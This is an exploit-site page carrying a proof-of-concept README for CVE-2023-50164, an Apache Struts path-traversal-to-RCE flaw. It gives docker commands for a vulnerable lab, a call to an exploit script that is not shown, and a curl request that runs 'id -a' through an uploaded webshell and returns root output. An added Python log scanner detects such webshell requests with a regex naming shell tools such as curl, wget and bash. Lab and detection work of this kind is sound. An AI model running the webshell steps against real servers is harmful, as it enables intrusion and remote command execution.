Exploit for Files or Directories Accessible to External Parties in Apache Struts


## https://sploitus.com/exploit?id=7487D152-E92E-58C6-B0D2-2377E8415CEC

# CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept

This PoC has been made to test RCE (Remote Code Execution) by exploiting the Apache Struts2 vulnerability.

![](img/1.png)

Build the image and run a container:

```console
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
```

Run the exploit:

```
$ cd exploit
$ ./exploit.sh
```

Now you can execute arbitrary commands on the server side, as shown:

```
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)
```

## Credits

- Thanks to @jakabakos for an example of a vulnerable application (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
- Thanks to Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) for the diagram above
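
A defender-side check for the webshell request shown above, as an added example that is not part of the original PoC: it scans access-log lines for successfully served JSP paths that are missing from a deployment baseline or that carry command-like parameter values. The log lines, the `KNOWN_JSPS` baseline and the command list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2023:10:01:02 +0000] "GET /index.action HTTP/1.1" 200 512
203.0.113.7 - - [12/Dec/2023:10:01:15 +0000] "GET /webshell/webshell.jsp?cmd=id%20-a HTTP/1.1" 200 54
198.51.100.4 - - [12/Dec/2023:10:02:00 +0000] "GET /search.jsp?q=struts HTTP/1.1" 200 901
198.51.100.4 - - [12/Dec/2023:10:02:05 +0000] "GET /old.jsp?cmd=whoami HTTP/1.1" 404 0
"""

# Assumed baseline: JSP paths that ship in the deployed WAR (hypothetical values).
KNOWN_JSPS = frozenset({"/search.jsp"})

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Parameter values that start with a common shell utility, after URL decoding.
CMD_RE = re.compile(r"^\s*(id|whoami|uname|cat|ls|pwd|curl|wget|sh|bash)\b")


def scan(log_text, known_jsps=KNOWN_JSPS):
    """Return findings for successfully served JSP requests that look like webshell use."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith((".jsp", ".jspx")):
            continue
        if not status.startswith("2"):
            continue  # request was not served; track such probes separately
        reasons = []
        if url.path not in known_jsps:
            reasons.append("jsp-not-in-baseline")
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if CMD_RE.match(value):
                reasons.append(f"command-like-param:{name}")
        if reasons:
            findings.append({"client": client, "time": ts,
                             "path": url.path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The baseline check is the stronger signal of the two: a served JSP that is absent from the deployed artifact points to a file written at runtime, whatever parameter names it accepts.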